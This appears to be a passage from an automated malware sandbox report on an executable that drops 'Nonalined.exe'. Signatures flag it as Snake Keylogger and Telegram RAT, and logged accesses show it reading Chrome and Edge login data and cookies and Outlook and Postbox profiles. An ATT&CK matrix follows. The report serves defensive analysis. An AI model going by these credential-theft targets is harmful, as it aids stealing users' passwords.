          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nonalined.exe VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exeCode function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034F7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: Nonalined.exe PID: 5156, type: MEMORYSTR
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: Yara matchFile source: Process Memory Space: Nonalined.exe PID: 5156, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Snake Keylogger
          Source: Yara matchFile source: 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Yara detected Telegram RAT
          Source: Yara matchFile source: Process Memory Space: Nonalined.exe PID: 5156, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          OS Credential Dumping          		2
          File and Directory Discovery          		Remote Services1
          Archive Collected Data          		1
          Web Service          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          PowerShell          		Boot or Logon Initialization Scripts1
          Access Token Manipulation          		2
          Obfuscated Files or Information          		LSASS Memory126
          System Information Discovery          		Remote Desktop Protocol1
          Data from Local System          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
          Process Injection          		1
          Software Packing          		Security Account Manager321
          Security Software Discovery          		SMB/Windows Admin Shares1
          Email Collection          		21
          Encrypted Channel          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading          		NTDS1
          Process Discovery          		Distributed Component Object Model1
          Clipboard Data          		3
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
          Masquerading          		LSA Secrets151
          Virtualization/Sandbox Evasion          		SSHKeylogging14
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
          Virtualization/Sandbox Evasion          		Cached Domain Credentials1
          Application Window Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation          		DCSync1
          System Network Configuration Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
          Process Injection          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
